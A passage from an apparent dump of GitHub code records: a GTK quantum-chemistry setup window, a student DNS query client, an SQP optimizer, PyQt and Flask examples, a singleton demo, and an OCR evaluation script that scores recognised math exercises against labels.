EasyHybridSetupQCModelWindow:\n    \"\"\" Class doc \"\"\"\n    \n    def __init__(self, main = None):\n        \"\"\" Class initialiser \"\"\"\n        self.easyhybrid_main = main\n        self.Visible = False \n        \n        self.methods_liststore = 
Gtk.ListStore(str, str, str)\n \n self.method_id = 0 # 0 for am1, 1 for pm3 and...\n self.charge = 0\n self.multiplicity = 1\n self.restricted = True\n \n self.adjustment_charge = Gtk.Adjustment(value=0,\n lower=-100,\n upper=100,\n step_increment=1,\n page_increment=1,\n page_size=0)\n \n self.adjustment_multiplicity = Gtk.Adjustment(value=1,\n lower=1,\n upper=100,\n step_increment=1,\n page_increment=1,\n page_size=0)\n \n self.methods_id_dictionary = {\n 0 : 'am1' ,\n 1 : 'am1dphot',\n 2 : 'pm3' ,\n 3 : 'pm6' ,\n 4 : 'mndo' ,\n \n }\n \n \n \n def OpenWindow (self):\n \"\"\" Function doc \"\"\"\n if self.Visible == False:\n self.builder = Gtk.Builder()\n self.builder.add_from_file(os.path.join(VISMOL_HOME,'easyhybrid/gui/easyhybrid_QCSetup_window.glade'))\n self.builder.connect_signals(self)\n \n self.window = self.builder.get_object('SetupQCModelWindow')\n self.window.set_keep_above(True)\n\n\n \n '''--------------------------------------------------------------------------------------------'''\n self.methods_type_store = Gtk.ListStore(str)\n methods_types = [\n \"am1\",\n \"am1dphot\",\n \"pm3\",\n \"pm6\",\n \"mndo\",\n \"ab initio - ORCA\",\n \"DFT / DFTB\",\n ]\n for method_type in methods_types:\n self.methods_type_store.append([method_type])\n #print (method_type)\n \n self.methods_combo = self.builder.get_object('QCModel_methods_combobox')\n self.methods_combo.connect(\"changed\", self.on_name_combo_changed)\n self.methods_combo.set_model(self.methods_type_store)\n renderer_text = Gtk.CellRendererText()\n self.methods_combo.pack_start(renderer_text, True)\n self.methods_combo.add_attribute(renderer_text, \"text\", 0)\n self.methods_combo.set_active(self.method_id)\n '''--------------------------------------------------------------------------------------------'''\n\n\n self.spinbutton_charge = self.builder.get_object('spinbutton_charge' )\n self.spinbutton_multiplicity = self.builder.get_object('spinbutton_multiplicity')\n self.spinbutton_charge .set_adjustment(self.adjustment_charge)\n self.spinbutton_multiplicity.set_adjustment(self.adjustment_multiplicity)\n \n self.window.show_all() \n self.builder.connect_signals(self) \n \n \n ''' Updating the number of atoms '''\n self.update_number_of_qc_atoms ()\n \n self.Visible = True\n\n else:\n ''' Updating the number of atoms '''\n self.update_number_of_qc_atoms ()\n\n \n def update_number_of_qc_atoms (self):\n \"\"\" Function doc \"\"\"\n self.entry_number_of_qc_atoms = self.builder.get_object('entry_number_of_qc_atoms')\n \n ''' Estiamting the QC charge '''\n '''----------------------------------------------------------------------------------------------'''\n psystem = self.easyhybrid_main.p_session.systems [self.easyhybrid_main.p_session.active_id]\n estimated_charge = 0.0\n for index in psystem['qc_table']:\n estimated_charge += psystem['system'].mmState.charges[index]\n \n estimated_charge = int(round(estimated_charge))\n self.spinbutton_charge.set_value (estimated_charge)\n '''----------------------------------------------------------------------------------------------'''\n\n \n if self.easyhybrid_main.p_session.systems[self.easyhybrid_main.p_session.active_id]['qc_table']:\n number_of_qc_atoms = len(self.easyhybrid_main.p_session.systems[self.easyhybrid_main.p_session.active_id]['qc_table'])\n self.entry_number_of_qc_atoms.set_text(str(number_of_qc_atoms))\n else:\n number_of_qc_atoms = len(self.easyhybrid_main.p_session.systems[self.easyhybrid_main.p_session.active_id]['system'].atoms)\n 
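# No QC region has been selected yet, so every atom of the active system\n            # is treated as quantum -- hence the ' (all)' suffix appended below.\n            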
self.entry_number_of_qc_atoms.set_text(str(number_of_qc_atoms)+ ' (all)')\n \n \n def CloseWindow (self, button, data = None):\n \"\"\" Function doc \"\"\"\n self.window.destroy()\n self.Visible = False\n \n #----------------------------------------------------------------\n def on_spian_button_change (self, widget):\n \"\"\" Function doc \"\"\"\n self.charge = self.spinbutton_charge.get_value_as_int()\n self.multiplicity = self.spinbutton_multiplicity.get_value_as_int()\n \n \n def on_name_combo_changed (self, combobox):\n \"\"\" Function doc \"\"\"\n self.method_id = self.builder.get_object('QCModel_methods_combobox').get_active()\n \n def on_button_ok (self, button):\n \"\"\" Function doc \"\"\"\n #print(button)\n #charge = self.spinbutton_charge.get_value_as_int()\n #multiplicity = self.spinbutton_multiplicity.get_value_as_int()\n #print('\\n\\ncharge' , self.charge )\n #print('multiplicity', self.multiplicity)\n #print('method_id' , self.method_id )\n \n if self.builder.get_object('radio_button_restricted').get_active():\n #print(\"%s is active\" % (self.builder.get_object('radio_button_restricted').get_label()))\n self.restricted = True\n else:\n #print(\"%s is not active\" % (self.builder.get_object('radio_button_restricted').get_label()))\n self.restricted = False\n \n\n \n parameters = {\n 'charge' : self.charge ,\n 'multiplicity' : self.multiplicity,\n 'method' : self.methods_id_dictionary[self.method_id] ,\n 'restricted' : self.restricted ,\n }\n\n\n parameters['energyTolerance' ] = float(self.builder.get_object('entry_energyTolerance').get_text())\n parameters['densityTolerance' ] = float(self.builder.get_object('entry_densityTolerance').get_text())\n parameters['maximumIterations'] = int(self.builder.get_object('entry_maximumIterations').get_text())\n\n\n\n self.easyhybrid_main.p_session.define_a_new_QCModel(parameters =parameters)\n self.easyhybrid_main.update_gui_widgets ()\n self.window.destroy()\n self.Visible = False\n\n","repo_name":"ferbachega/EasyHybrid3_old","sub_path":"easyhybrid/gui/QCSetup_window.py","file_name":"QCSetup_window.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"70316466135","text":"#!/usr/bin/env python3\n\nimport socket, sys\n\n# Mirar servidor DNS en fichero \"/etc/resolv.conf\"\nDNS_DIR = '8.8.4.4'\nDNS_PORT = 53\n\nif len( sys.argv ) != 2:\n\tprint( \"Uso: python3 {} \".format( sys.argv[0] ) )\n\texit( 1 )\n\nnombre_dns = sys.argv[1]\n\nserv_dns = (DNS_DIR, DNS_PORT)\n\ns = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\n\n\"\"\"A COMPLETAR POR EL/LA ESTUDIANTE:\nPreparar pregunta DNS\n\"\"\"\nnum = 1\n# Header section\n# # ID\nid = 351\nbuf = id.to_bytes(2, byteorder=\"big\")\n# # Flags\nnum = 256\nbuf += num.to_bytes(2, byteorder=\"big\")\nnum = 1\n# # QDCOUNT\nbuf+= num.to_bytes(2, byteorder=\"big\")\nnum = 0\n# # ANCOUNT\nbuf += num.to_bytes(2, byteorder=\"big\")\n# # NSCOUNT\nbuf += num.to_bytes(2, byteorder=\"big\")\n# # ARCOUNT\nbuf += num.to_bytes(2, byteorder=\"big\")\n# Question section\n# # QNAME\n\n\nprint('NOMBRE DNS: ', nombre_dns)\n\n\ndomain_s = nombre_dns.split(\".\")\nname = b''\nfor part in domain_s:\n\tname += len(part).to_bytes(1, byteorder=\"big\")\n\tname += part.encode()\n\n\nname += b'\\x00'\n\nbuf += name\nnum = 1\n# # QTYPE. type = A\nbuf += num.to_bytes(2, byteorder=\"big\")\n# # QCLASS. 
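(16-bit integer; num is still 1)\n# Once the two QCLASS bytes are appended below, buf holds a complete question,\n# e.g. for a hypothetical lookup of example.com:\n#   header (12 bytes) | 07 'example' 03 'com' 00 | QTYPE=0x0001 (A) | QCLASS=0x0001 (IN)\n# # 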
class = IN\nbuf += num.to_bytes(2, byteorder=\"big\")\n# -- Pregunta DNS completa --\nprint( \"Pregunta DNS a enviar:\\r\\n\", buf )\n# Enviar pregunta DNS\ns.sendto( buf, serv_dns )\n\n\nprint(\"ENVIADO !! \")\n\n# Recibir respuesta\nbuf = s.recv( 1024 )\n\nprint( \"Respuesta recibida:\\r\\n\", buf)\n\"\"\"A COMPLETAR POR EL/LA ESTUDIANTE:\nIntrepretar respuesta\n\"\"\"\n\n\n\n\n\n\n# Header section\n# # ID\nres_id = int.from_bytes(buf[0:2], 'big')\nprint(res_id)\n# # Flags: |QR| Opcode |AA|TC|RD|RA| Z | RCODE |\n# # +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+\n# # QDCOUNT\t\nres_count = int.from_bytes(buf[2:4], 'big')\nprint(res_count)\n# # ANCOUNT\nres_ancount = int.from_bytes(buf[4:6], 'big')\nprint(res_ancount)\n# # NSCOUNT\nres_ancount = int.from_bytes(buf[6:8], 'big')\nprint(\"ANCOUNT: {} ({}) \".format(res_ancount > 0, res_ancount)) # ANCONT determina el número de direcciones IP resueltas. Algunos dominios \n# (por ejemplo los que usan el proxy de cloudflare, suelen tener 2 IP en el registro A)\n# # ARCOUNT\nancount = res_ancount\nres_arcount = bool(int.from_bytes(buf[8:10], 'big'))\n\n# Question section\n# # QNAME\n\nqname = buf[12] \nres_ancount = res_ancount > 0 # Esto es true si el campo ANCOUNT devuelve algo mayor que 0 (lo que implica que ha encontrado registros para el dominio especificado) \n\ni = 13\nprint(\"Question section: \", buf[12:13])\n\nqname_ = \"\"\nwhile (qname != 0):\n\tqname = buf[i]\n\tc = chr(qname)\n\tif (qname < 97):\n\t\tqname_ += \".\"\n\telse:\n\t\tqname_ += str(c)\n\ti = i+1\n\nqname_ = qname_[:-1] \nprint(\"QNAME: \", qname_)\n# # QTYPE\nqtype = int.from_bytes(buf[i:i+2], 'big')\nprint(\"QTYPE: \", qtype) \n# # QCLASS\ni = i+2\nqclass = int.from_bytes(buf[i:i+2], 'big')\nprint(\"QCLASS: \", qclass) \ni = i+2 \n# Answer section: 4.1.3. Resource record format\nif not res_ancount:\n\tprint( 'No se ha recibido ningún registro en la sección de respuestas!' )\nelse:\n\t# # NAME (Message compression?)\n\tp = buf[i]\n\tn = \"\"\n\twhile (p!=0):\n\t\tn += chr(p)\n\t\ti = i+1 \n\t\tp = buf[i]\n\tprint(\"NAME: \", n) \n\t# # TYPE\n\tprint(\"TYPE: \", int.from_bytes(buf[i:i+2], 'big'))\n\ti = i +2 \n\t# # CLASS\n\tprint(\"CLASS: \", int.from_bytes(buf[i:i+2], 'big'))\n\t# # TTL: a 32 bit unsigned integer\n\ti = i +2\n\tprint(\"TTL: \", int.from_bytes(buf[i:i+4], 'big'))\n\ti = i +4\n\t# # RDLENGTH: an unsigned 16 bit integer\n\tprint(\"RDLENGTH: \", int.from_bytes(buf[i:i+2], 'big'))\n\t# # RDATA\n\tip = \"\"\n\tip += str(int.from_bytes(buf[len(buf) - 4 : len(buf) - 3], 'big')) + \".\"\n\tip += str(int.from_bytes(buf[len(buf) - 3 : len(buf) - 2], 'big')) + \".\"\n\tip += str(int.from_bytes(buf[len(buf) - 2 : len(buf) - 1], 'big')) + \".\"\n\tip += str(int.from_bytes(buf[len(buf) - 1 : len(buf)] , 'big'))\n\tprint(\"Ip completa: \", ip)\n# Authority section: 4.1.3. Resource record format\n# Additional section: 4.1.3. 
Resource record format\n\ts.close()\n","repo_name":"mikelmiras/labos-sar","sub_path":"lab03/dns_cli.py","file_name":"dns_cli.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4451346508","text":"from numpy import *\nfrom qlcp import qlcp\ntry:\n import openopt\nexcept:\n pass # if OpenOpt is not installed, the qpsolver kwarg can't be specified\n \ndef _simple_grad(f, x, delta = 1e-8):\n nvars = x.shape[0]\n Id = eye(nvars)*delta\n grad = array([(f(x+Id[i,:]) - f(x-Id[i,:]))/(2*delta) for i in range(nvars)])\n return grad\n\ndef _simple_hessian(f, x, delta = 1e-4): # generally too slow for use\n g = lambda x: _simple_grad(f, x, delta = delta) # g(x) is the gradient of f\n return _simple_grad(g, x, delta=delta)\n\ndef _simple_hessdiag(f, x, delta = 1e-4):\n nvars = x.shape[0]\n Id = eye(nvars)*delta\n hd = array([(f(x+Id[i,:]) + f(x-Id[i,:]) - 2*f(x))/delta**2 for i in range(nvars)]).flatten()\n return diag(hd)\n\ndef sqlcp(f, x0, df=None, A=None, b=None, Aeq=None, beq=None, lb=None, ub=None, minstep=1e-15, minfchg=1e-15, qpsolver=None, callback = None):\n '''\n SQP solver. Approximates f in x0 with paraboloid with same gradient and hessian,\n then finds its minimum with a quadratic solver (qlcp by default) and uses it as new point, \n iterating till changes in x and/or f drop below given limits. \n Requires the Hessian to be definite positive.\n The Hessian is initially approximated by its principal diagonal, and then\n updated at every step with the BFGS method.\n f: objective function of x to be minimized\n x0: initial value for f\n df: gradient of f: df(f) should return a function of such as f(x) would\n return the gradient of f in x. If missing or None, an approximation \n will be calculated with an internal finite-differences procedure.\n A: array of inequality constraints (A x >= b)\n b: right-hand side of A x >= b\n Aeq: array of equality constraints (Aeq x = beq)\n beq: right-hand side of Aeq x >= beq\n lb: lower bounds for x (assumed -Inf if missing)\n ub: upper bounds for x (assumed +Inf if missing)\n minstep: iterations terminate when updates to x become < minstep (default: 1e-15)\n minfchg: iterations terminate when RELATIVE changes in f become < minfchg (default: 1e-15)\n qpsolver: if None, qlcp; else a solver accepted by openopt.QP (if OpenOpt and \n that particular solver are installed)\n '''\n \n nvars = x0.shape[0]\n x = x0.copy()\n niter = 0\n deltah = 1e-4\n deltag = deltah**2\n \n if df == None: # df(x) is the gradient of f in x\n df = lambda x: _simple_grad(f, x, deltag)\n \n twoI = 2.*eye(nvars)\n oldfx = f(x)\n gradfx = df(x) # return the gradient of f() at x\n hessfx = _simple_hessdiag(f,x,delta=deltah) # good enough, and much faster, but only works if REAL Hessian is DP!\n invhessfx = linalg.inv(hessfx)\n while True:\n niter += 1\n \n # compute the b, beq, lb and ub for the QP sub-problem (as bx, beqx, lbx, ubx)\n bx = b if b == None else b-dot(A,x)\n beqx = beq if beq == None else beq-dot(Aeq,x)\n lbx = lb if lb == None else lb - x\n ubx = ub if ub == None else ub - x\n\n if qpsolver == None:\n deltax = qlcp(hessfx, gradfx, A=A, b=bx, Aeq=Aeq, beq=beqx, lb=lbx, ub=ubx, QI=invhessfx)\n else:\n p = openopt.QP(hessfx, gradfx, A=A, b=bx, Aeq=Aeq, beq=beqx, lb=lbx, ub=ubx)\n p.ftol = 1.e-10\n r = p.solve(qpsolver, iprint = -1)\n deltax = p.xf\n \n if deltax == None:\n #print(\"Cannot converge, sorry.\")\n x = None\n break\n \n x += deltax\n if linalg.norm(deltax) < 
minstep:\n break\n fx = f(x)\n if abs(fx-oldfx) < minfchg*abs(fx):\n break\n if callback is not None and callback(x):\n break\n \n oldfx = fx\n oldgradfx = gradfx.copy()\n gradfx = df(x) # return the gradient of f() at the new x\n # we might also put a termination test on the norm of grad...\n \n '''\n # recalc hessian afresh would be sloooow...\n #hessfx = _simple_hessian(f,x,delta=deltah) # return the hessian of f() at x\n hessfx = _simple_hessdiag(f,x,delta=deltah) # return the hessian (diag only) of f() at x\n invhessfx = linalg.inv(hessfx)\n '''\n # update Hessian and its inverse with BFGS based on current Hessian, deltax and deltagrad \n # See http://en.wikipedia.org/wiki/BFGS\n deltagrad = gradfx - oldgradfx\n hdx = dot(hessfx, deltax)\n dgdx = dot(deltagrad,deltax)\n #if dgdx < 0.:\n # print \"deltagrad * deltax < 0!\" # a bad sign\n hessfx += ( outer(deltagrad,deltagrad) / dgdx - \n outer(hdx, hdx) / dot(deltax, hdx) )\n # now update inverse of Hessian \n '''\n invhessfx = linalg.inv(hessfx)\n '''\n hidg = dot(invhessfx,deltagrad)\n oIdgdeltax = outer(hidg,deltax)\n invhessfx += ( (dgdx+dot(deltagrad,hidg))*outer(deltax,deltax)/(dgdx**2) -\n (oIdgdeltax+oIdgdeltax.T)/dgdx ) # just because invhessfx is symmetric, or else:\n #(oIdgdeltax+outer(deltax,dot(invhessfx.T,deltagrad)))/dgdx )\n return x, niter\n \n","repo_name":"troyshu/openopt","sub_path":"openopt/solvers/HongKongOpt/sqlcp.py","file_name":"sqlcp.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"67"} +{"seq_id":"71531709652","text":"import sys\r\nfrom PyQt5.QtWidgets import QWidget, QPushButton, QHBoxLayout, QVBoxLayout, QApplication\r\n\r\nclass Example(QWidget):\r\n\tdef __init__(self):\r\n\t\tsuper().__init__()\r\n\t\tself.initUI()\r\n\r\n\tdef initUI(self):\r\n\t\tokButton=QPushButton(\"OK\")\r\n\t\tcancelButton=QPushButton(\"Cancel\")\r\n\r\n\r\n\t\t#We create a horizontal box layout and add a stretch factor and both buttons. The stretch adds a\r\n\t\t#stretchable space before the two buttons. This will push them to the right of the window\r\n\t\thbox=QHBoxLayout()\r\n\t\thbox.addStretch(1)\r\n\t\thbox.addWidget(okButton)\r\n\t\thbox.addWidget(cancelButton)\r\n\r\n\r\n\t\t#To create the necessary layout, we put a horizontal layout into a vertical one. 
The stretch factor in\r\n\t\t#the vertical box will push the horizontal box with the buttons to the bottom of the window.\r\n\t\tvbox=QVBoxLayout()\r\n\t\tvbox.addStretch(1)\r\n\t\tvbox.addLayout(hbox)\r\n\r\n\r\n\t\t#Finally we set the main layout of the window\r\n\t\tself.setLayout(vbox)\r\n\r\n\t\tself.setGeometry(300,300,300,150)\r\n\t\tself.setWindowTitle('Buttons')\r\n\t\tself.show()\r\n\r\nif __name__=='__main__':\r\n\tapp=QApplication(sys.argv)\r\n\tex=Example()\r\n\tsys.exit(app.exec_())","repo_name":"dibakarbose/PyQt","sub_path":"PracticeCodes/12_Box Layout.py","file_name":"12_Box Layout.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73999321812","text":"from flask import Flask, Response\nfrom flask_cors import CORS\nimport json\nimport time\n\napp = Flask(__name__)\nCORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\nwith open('data/postcodes.json', 'r') as data:\n postcode_data = json.load(data)\n\n\n@app.route(\"/postcodes\", methods=['GET'])\ndef get_postcodes():\n return Response(json.dumps(postcode_data), mimetype='application/json')\n\n\n@app.route(\"/postcodes/\", methods=['GET'])\ndef get_postcode(postcode: str):\n data = [record for record in postcode_data\n if record['postal_code'] == postcode]\n #time.sleep(10)\n return Response(json.dumps(data), mimetype='application/json')\n","repo_name":"dedickinson/base-react-app","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39020444908","text":"\"\"\"\n测试单例模式\n\"\"\"\n\n\nclass MySingleton:\n __obj = None # 类属性\n __init_flag = True\n\n def __new__(cls, *args, **kwargs):\n if cls.__obj == None:\n cls.__obj = object.__new__(cls)\n return cls.__obj\n\n def __init__(self, name):\n if MySingleton.__init_flag:\n print(\"init......\")\n self.name = name\n MySingleton.__init_flag = False\n\n\nif __name__ == '__main__':\n a = MySingleton(\"aaaa\")\n b = MySingleton(\"bbbb\")\n print(a)\n print(b)\n","repo_name":"Jacket777/python_basic","sub_path":"ch09_Class/code26_singletonMode.py","file_name":"code26_singletonMode.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25908319813","text":"from pipline import pipeline,create_sess,Result\nfrom glob import glob\nfrom tqdm import tqdm\nimport os\nimport re\nfrom inference import set_xml_data\nimport Levenshtein\nfrom layout_utils import row_get_pair,column_get_pair,column_iou\nfrom utils import draw_pair,eval_label,draw_bboxes,draw_result,get_iou\nfrom math import log\nimport numpy as np\nimport cv2\nfrom PIL import Image,ImageDraw,ImageFont\nimport requests\nimport base64\nfrom from_xml_read_label import label_replace\n\n\n\ndef file_content(filename):\n with open(filename, 'rb') as f:\n return f.read()\n\ndef get_json_result(filename):\n img = file_content(filename)\n\n\n b64 = base64.b64encode(img).decode()\n\n BASE_URL = 'http://221.122.129.99:8005/ikkyyu/'\n data = {'secretkey':'tal', 'appkey':'tal', 'content':b64}\n r = requests.post(BASE_URL, data=data)\n\n return r.json()\n\n# print(get_json_result('1.JPG'))\n\nclass Json_Result():\n\n def __init__(self):\n self.connect_result = []\n\n\nclass Single_Img_Evaluate(object):\n def __init__(self,true_result,pre_result,img,name,save_path,log_path,bboxes, types):\n 
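# Per-image tallies: *_all / *_right count questions by type ('=' equations,\n        # '()' fill-in-the-blank, everything else remainder problems); char_acc_all\n        # accumulates 1 - normalized Levenshtein distance per matched pair, and\n        # recall counts ground-truth boxes matched to a prediction (IoU > 0.5).\n        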
self.equation_all = 0\n self.equation_right = 0\n self.bracket_all = 0\n self.bracket_right = 0\n self.residual_all = 0\n self.residual_right = 0\n self.state_all = 0\n self.state_right = 0\n self.char_acc_all = 0\n self.char_acc = 0\n self.recall = 0\n self.all_num = 0\n self.error = []\n self.not_recall = []\n self.true_result = true_result\n self.pre_result = pre_result\n self.img = img\n self.name = name\n self.save_path = save_path\n self.log_path = log_path\n self.bboxes = bboxes\n self.types = types\n\n\n def compute(self):\n self.all = self.residual_all+self.bracket_all+self.equation_all\n self.right = self.residual_right+self.bracket_right+self.equation_right\n self.seq_acc = self.right/self.all\n self.state_acc = self.state_right/self.state_all\n self.char_acc = self.char_acc_all / self.all\n self.all_recall = self.recall / self.all_num\n\n\n if self.equation_all == 0:\n self.equation_acc = 0\n else:\n self.equation_acc = self.equation_right/self.equation_all\n if self.bracket_all == 0:\n self.bracket_acc = 0\n else:\n self.bracket_acc = self.bracket_right/self.bracket_all\n if self.residual_all == 0:\n self.residual_acc = 0\n else:\n self.residual_acc = self.residual_right/self.residual_all\n\n\n self.evaluate_dict = {'all':self.seq_acc,'=':self.equation_acc,'()':self.bracket_acc,'...':self.residual_acc,'state':self.state_acc,'char_acc':\n self.char_acc,'recall':self.all_recall}\n\n\n def print_write_result(self,log_path):\n print('图片名称:{}'.format(self.name))\n print('总共:{}道题,正确率:{}'.format(self.all,self.seq_acc))\n print('等式:{}道题,正确率:{}'.format(self.equation_all,self.equation_acc))\n print('填空题:{}道题,正确率:{}'.format(self.bracket_all,self.bracket_acc))\n print('求余数:{}道题,正确率:{}'.format(self.residual_all,self.residual_acc))\n print('判断对错的正确率{}'.format(self.state_acc))\n print('字符正确率{}'.format(self.char_acc))\n print('召回率{}'.format(self.all_recall))\n\n log = open(log_path, 'a')\n log.writelines('图片名称:{}\\n'.format(self.name))\n log.writelines('总共:{}道题,正确率:{}\\n'.format(self.all,self.seq_acc))\n log.writelines('等式:{}道题,正确率:{}\\n'.format(self.equation_all,self.equation_acc))\n log.writelines('填空题:{}道题,正确率:{}\\n'.format(self.bracket_all,self.bracket_acc))\n log.writelines('求余数:{}道题,正确率:{}\\n'.format(self.residual_all,self.residual_acc))\n log.writelines('判断对错的正确率{}\\n'.format(self.state_acc))\n log.writelines('字符正确率{}\\n'.format(self.char_acc))\n log.writelines('召回率{}\\n'.format(self.all_recall))\n log.writelines('-------------------------------------------------------------------------------------------------------------\\n')\n\n\n\n def get_pair(self):\n self.result_pair = {}\n\n for i,true_box in enumerate(self.true_result.all_box):\n max_iou = 0\n pair = -1\n for j,pre_box in enumerate(self.pre_result.connect_result):\n iou = get_iou(pre_box.bbox,true_box.bbox)\n if iou>max_iou:\n max_iou = iou\n pair = j\n\n if max_iou>0.5:\n self.result_pair[i] = pair\n\n else:\n self.result_pair[i] = -1\n\n\n return self.result_pair\n\n\n def statistic_data(self):\n\n for true_num in self.result_pair:\n\n true_box = self.true_result.all_box[true_num]\n\n if self.result_pair[true_num] != -1:\n pre_box = self.pre_result.connect_result[self.result_pair[true_num]]\n\n if true_box.classes == '=':\n if true_box.label == pre_box.output:\n self.equation_right = self.equation_right+1\n else:\n self.error.append([true_box,pre_box])\n self.equation_all = self.equation_all+1\n\n elif true_box.classes == '()':\n if true_box.label == pre_box.output:\n self.bracket_right = self.bracket_right+1\n else:\n 
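# predicted text differs from the label: keep the (truth, prediction) pair so draw_result() can render truth in green and prediction in red\n                        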
self.error.append([true_box, pre_box])\n self.bracket_all = self.bracket_all+1\n\n else:\n if true_box.label == pre_box.output:\n self.residual_right = self.residual_right+1\n elif true_box.label.replace('*','') == pre_box.output.replace('*',''):\n self.residual_right = self.residual_right + 1\n else:\n self.error.append([true_box, pre_box])\n self.residual_all = self.residual_all+1\n\n self.char_acc_all = self.char_acc_all + 1 - (Levenshtein.distance(true_box.label, pre_box.output) / len(true_box.label))\n\n if true_box.state == pre_box.state:\n self.state_right = self.state_right+1\n self.state_all = self.state_all+1\n\n self.recall = self.recall+1\n\n else:\n self.not_recall.append(true_box)\n\n self.all_num = self.all_num+1\n\n\n def draw_result(self):\n x_pro = 3024 / self.img.shape[1]\n y_pro = 4031 / self.img.shape[0]\n img = cv2.resize(self.img, (3024, 4032))\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n ttfont = ImageFont.truetype('SimSun.ttf', 50)\n img2 = img.copy()\n\n if self.error:\n for error_result in self.error:\n true = error_result[0]\n pre = error_result[1]\n cv2.rectangle(img, (int(true.left * x_pro), int(true.top * y_pro)),\n (int(true.right * x_pro), int(true.bottom * y_pro)), (0,255,0), 4)\n cv2.rectangle(img, (int(pre.left * x_pro), int(pre.top * y_pro)),\n (int(pre.right * x_pro), int(pre.bottom * y_pro)), (255,0,0), 4)\n\n img = Image.fromarray(img)\n draw = ImageDraw.Draw(img)\n draw.text((int(true.left * x_pro), int(true.top * y_pro - 50)), true.output, fill='green',\n font=ttfont)\n draw.text((int(pre.left * x_pro), int(pre.bottom * y_pro - 50)), pre.output, fill='red',\n font=ttfont)\n\n img = np.asarray(img)\n\n\n if self.not_recall:\n for result in self.not_recall:\n cv2.rectangle(img, (int(result.left * x_pro), int(result.top * y_pro)),\n (int(result.right * x_pro), int(result.bottom * y_pro)), (0, 0, 255), 4)\n cv2.rectangle(img2, (int(result.left * x_pro), int(result.top * y_pro)),\n (int(result.right * x_pro), int(result.bottom * y_pro)), (0, 0, 255), 4)\n img = Image.fromarray(img)\n draw = ImageDraw.Draw(img)\n draw.text((int(result.left * x_pro), int(result.top * y_pro - 50)), result.output, fill='blue',\n font=ttfont)\n\n img = np.asarray(img)\n\n for i, bbox in enumerate(self.bboxes):\n if self.types[i] == 'print':\n color = (0, 255, 0)\n else:\n color = (255, 0, 0)\n cv2.rectangle(img2, (int(bbox[0] * x_pro), int(bbox[1] * y_pro)),\n (int(bbox[2] * x_pro), int(bbox[3] * y_pro)), color, 4)\n\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n img2 = cv2.cvtColor(img2, cv2.COLOR_RGB2BGR)\n if self.error:\n cv2.imwrite(os.path.join(self.save_path,self.name+'.jpg'),img)\n if self.not_recall:\n cv2.imwrite(os.path.join(self.save_path, self.name + '_.jpg'), img2)\n\n\n\nclass Evaluate_Data(object):\n def __init__(self):\n self.equation_all = 0\n self.equation_right = 0\n self.bracket_all = 0\n self.bracket_right = 0\n self.residual_all = 0\n self.residual_right = 0\n self.state_all = 0\n self.state_right = 0\n self.char_acc = 0\n self.char_acc_all = 0\n self.recall = 0\n self.all_num = 0\n\n def add_data(self,single_img_evaluate):\n self.equation_all = self.equation_all + single_img_evaluate.equation_all\n self.equation_right = self.equation_right + single_img_evaluate.equation_right\n self.bracket_all = self.bracket_all + single_img_evaluate.bracket_all\n self.bracket_right = self.bracket_right + single_img_evaluate.bracket_right\n self.residual_all = self.residual_all + single_img_evaluate.residual_all\n self.residual_right = self.residual_right + 
single_img_evaluate.residual_right\n self.state_all = self.state_all + single_img_evaluate.state_all\n self.state_right = self.state_right + single_img_evaluate.state_right\n self.char_acc_all = self.char_acc_all + single_img_evaluate.char_acc_all\n self.recall = self.recall + single_img_evaluate.recall\n self.all_num = self.all_num + single_img_evaluate.all_num\n\n def compute(self):\n self.all = self.residual_all+self.bracket_all+self.equation_all\n self.right = self.residual_right+self.bracket_right+self.equation_right\n self.seq_acc = self.right/self.all\n self.state_acc = self.state_right/self.state_all\n self.char_acc = self.char_acc_all / self.all\n self.all_recall = self.recall / self.all_num\n\n\n if self.equation_all == 0:\n self.equation_acc = 0\n else:\n self.equation_acc = self.equation_right/self.equation_all\n if self.bracket_all == 0:\n self.bracket_acc = 0\n else:\n self.bracket_acc = self.bracket_right/self.bracket_all\n if self.residual_all == 0:\n self.residual_acc = 0\n else:\n self.residual_acc = self.residual_right/self.residual_all\n\n\n self.evaluate_dict = {'all':self.seq_acc,'=':self.equation_acc,'()':self.bracket_acc,'...':self.residual_acc,'state':self.state_acc,'char_acc':\n self.char_acc,'recall':self.all_recall}\n\n\n def print_result(self):\n print('总共:{}道题,正确率:{}'.format(self.all,self.seq_acc))\n print('等式:{}道题,正确率:{}'.format(self.equation_all,self.equation_acc))\n print('填空题:{}道题,正确率:{}'.format(self.bracket_all,self.bracket_acc))\n print('求余数:{}道题,正确率:{}'.format(self.residual_all,self.residual_acc))\n print('判断对错的正确率{}'.format(self.state_acc))\n print('字符正确率{}'.format(self.char_acc))\n print('召回率{}'.format(self.all_recall))\n\n def write_result(self,log_path):\n log = open(log_path, 'a')\n log.writelines('总共:{}道题,正确率:{}\\n'.format(self.all, self.seq_acc))\n log.writelines('等式:{}道题,正确率:{}\\n'.format(self.equation_all, self.equation_acc))\n log.writelines('填空题:{}道题,正确率:{}\\n'.format(self.bracket_all, self.bracket_acc))\n log.writelines('求余数:{}道题,正确率:{}\\n'.format(self.residual_all, self.residual_acc))\n log.writelines('判断对错的正确率{}\\n'.format(self.state_acc))\n log.writelines('字符正确率{}\\n'.format(self.char_acc))\n log.writelines('召回率{}\\n'.format(self.all_recall))\n log.writelines('-------------------------------------------------------------------------------------------------------------\\n')\n\n\n\ndef json_to_result(json,img):\n all_result = json['questionImgs']\n json_result = Json_Result()\n for q_result in all_result:\n label = q_result['questionContext']\n bbox = 